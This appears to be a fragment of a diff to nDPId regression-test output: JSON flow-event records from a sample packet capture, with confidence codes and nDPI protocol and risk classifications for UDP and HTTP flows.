CP\/Ys2QYll2fN6Xbf+94Si8B0K0uar09Ty6DviDBYXt5\/8XpJtEJWzUaGUBbbCEtHIzhk3G2p2itRnzSyt10DUes\/e9jLtGO\/lchukfEf
Gu5+Y3TxFhX7Hv333wv7QEFPFBprU3t6V4dIS250PFtx3UWkJ\/KX1vB3GhaMaxBrDbzvjhV2WKQ\/Nnv8ZBY9VdRfkCLJV\/HblSMFcUwHxo4IG2hrHP6TmVmYZ8nIHO7sPEv51L3RYhnBGODsvT6Nl8\/uUNtzAC0mRAznmk7IsUW9cl71zuY0pjDL21g4bID6MrMuZm1Md9NHvU392TiT0doM\/mcbpr5kwNIJ4xpVq6TbrnGRECU65QT+3b\/mxQ15tdSgLRxavOq35PnNQqYK5ZOBDF9u2L\/jTZsE\/v5\/BjNF7aLpx8Nx9Ddl+8avs92OeLW3xatFRgatYsqSPdDSCWt\/7DKoHeOQNGej+4sPaab2IT40o+lWkNrHHFVKhXd8C8SlbnU3Y75R26q+3sGFS+RyE6QyJ\/9EgUPSerMv2RjAJ0haqzfaWTRZ1ZgTOEuLBSeWyw\/5ab4eQDQi0DSVpRkK9n7z6c0f+4O2vunGdSrnv5FBBQxLbrd8yHz3RejyafRygtcHHU3GotYO\/8AGow33n2mzZuLfvvluwSNjTr7s9+t1mvnBDTAJ\/w70fY1Tmwt8AmO+R4XaV\/P8kj5BSwxsIQ6s44lL2edfFiPzVM2v9TOk+F5lYNtoawNgI43Hns0wnw00qQhKTaOTYk+\/7rXY0Dy57cX2LbiFl0dMrMNwkSmzc5OOQEillNkcjpMP\/us+nfs+bmsUceWf2FdKzv2OlHy5srMsxLZZ64aGceMbX4ACl2x0Ow5nsH0a2jCfohcp78SJIn9dHE3evNd2nn4FwNTdYtr8pjqtj6OYulAm5wuv5my4xx1pmVWIbK7w519BlDX6tBN7SDWo4cCZLo7HGPFpXlKMdV6PWa68yPUlNYrLHFOnDpF5xk8sJqNdF2omWAwtrP65WUrU3KZ8D62RRrQfwB0KLK2eRd5P3m9hXVnQ6Nq"} 00597{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136834,"flow_last_seen":1467353136834,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.26.193.119","src_port":22793,"dst_port":7133,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136834,"flow_last_seen":1467353136834,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.26.193.119","src_port":22793,"dst_port":7133,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00824{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1467353151975,"flow_last_seen":1467353165019,"flow_idle_time":7580000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":24650,"flow_avg_l4_payload_len":1071,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"77.234.40.96","src_port":50486,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"HTTP.Cybersec","breed":"Safe","category":"Cybersecurity"}} 
+00824{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1467353151975,"flow_last_seen":1467353165019,"flow_idle_time":7580000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":24650,"flow_avg_l4_payload_len":1071,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"77.234.40.96","src_port":50486,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"HTTP.Cybersec","breed":"Safe","category":"Cybersecurity"}} 00598{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136835,"flow_last_seen":1467353136835,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"115.157.62.243","src_port":22793,"dst_port":29006,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136835,"flow_last_seen":1467353136835,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"115.157.62.243","src_port":22793,"dst_port":29006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00597{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136833,"flow_last_seen":1467353136833,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.250.102.66","src_port":22793,"dst_port":1107,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136833,"flow_last_seen":1467353136833,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.250.102.66","src_port":22793,"dst_port":1107,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353136757,"flow_last_seen":1467353136757,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65125,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353136757,"flow_last_seen":1467353136757,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65125,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353159222,"flow_last_seen":1467353159428,"flow_idle_time":7580000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":581,"flow_avg_l4_payload_len":290,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65127,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
-00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353181295,"flow_last_seen":1467353181515,"flow_idle_time":7580000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":589,"flow_avg_l4_payload_len":294,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65128,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353159222,"flow_last_seen":1467353159428,"flow_idle_time":7580000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":581,"flow_avg_l4_payload_len":290,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65127,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353181295,"flow_last_seen":1467353181515,"flow_idle_time":7580000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":589,"flow_avg_l4_payload_len":294,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65128,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136835,"flow_last_seen":1467353136835,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.26.74.190","src_port":22793,"dst_port":1037,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136835,"flow_last_seen":1467353136835,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.26.74.190","src_port":22793,"dst_port":1037,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00598{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136835,"flow_last_seen":1467353136835,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"210.44.232.243","src_port":22793,"dst_port":21044,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136835,"flow_last_seen":1467353136835,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"210.44.232.243","src_port":22793,"dst_port":21044,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1467353136835,"flow_last_seen":1467353136836,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":344,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"1.169.136.116","src_port":22793,"dst_port":17951,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1467353136835,"flow_last_seen":1467353136836,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":344,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"1.169.136.116","src_port":22793,"dst_port":17951,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353139305,"flow_last_seen":1467353139309,"flow_idle_time":7580000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":759,"flow_tot_l4_payload_len":985,"flow_avg_l4_payload_len":492,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.66.182.24","src_port":50466,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353139305,"flow_last_seen":1467353139309,"flow_idle_time":7580000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":759,"flow_tot_l4_payload_len":985,"flow_avg_l4_payload_len":492,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.66.182.24","src_port":50466,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"}} 00598{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136837,"flow_last_seen":1467353136838,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"220.130.154.23","src_port":22793,"dst_port":35941,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136837,"flow_last_seen":1467353136838,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"220.130.154.23","src_port":22793,"dst_port":35941,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1467353152692,"flow_last_seen":1467353167734,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":798,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"239.255.255.250","src_port":59648,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353156641,"flow_last_seen":1467353156700,"flow_idle_time":7580000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":2184,"flow_avg_l4_payload_len":728,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50488,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
-00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1467353157138,"flow_last_seen":1467353157157,"flow_idle_time":7580000,"flow_min_l4_payload_len":372,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":32840,"flow_avg_l4_payload_len":1216,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50491,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353157509,"flow_last_seen":1467353159746,"flow_idle_time":7580000,"flow_min_l4_payload_len":376,"flow_max_l4_payload_len":403,"flow_tot_l4_payload_len":1168,"flow_avg_l4_payload_len":389,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50494,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
-00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":246,"flow_first_seen":1467353189325,"flow_last_seen":1467353189439,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":306749,"flow_avg_l4_payload_len":1246,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50505,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353190040,"flow_last_seen":1467353190044,"flow_idle_time":7580000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":1009,"flow_tot_l4_payload_len":1167,"flow_avg_l4_payload_len":583,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50507,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353190634,"flow_last_seen":1467353190638,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":366,"flow_tot_l4_payload_len":510,"flow_avg_l4_payload_len":255,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1467353152692,"flow_last_seen":1467353167734,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":798,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"239.255.255.250","src_port":59648,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353156641,"flow_last_seen":1467353156700,"flow_idle_time":7580000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":2184,"flow_avg_l4_payload_len":728,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50488,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
+00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1467353157138,"flow_last_seen":1467353157157,"flow_idle_time":7580000,"flow_min_l4_payload_len":372,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":32840,"flow_avg_l4_payload_len":1216,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50491,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353157509,"flow_last_seen":1467353159746,"flow_idle_time":7580000,"flow_min_l4_payload_len":376,"flow_max_l4_payload_len":403,"flow_tot_l4_payload_len":1168,"flow_avg_l4_payload_len":389,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50494,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":246,"flow_first_seen":1467353189325,"flow_last_seen":1467353189439,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":306749,"flow_avg_l4_payload_len":1246,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50505,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353190040,"flow_last_seen":1467353190044,"flow_idle_time":7580000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":1009,"flow_tot_l4_payload_len":1167,"flow_avg_l4_payload_len":583,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50507,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353190634,"flow_last_seen":1467353190638,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":366,"flow_tot_l4_payload_len":510,"flow_avg_l4_payload_len":255,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00597{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136837,"flow_last_seen":1467353136837,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"114.47.91.129","src_port":22793,"dst_port":22576,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 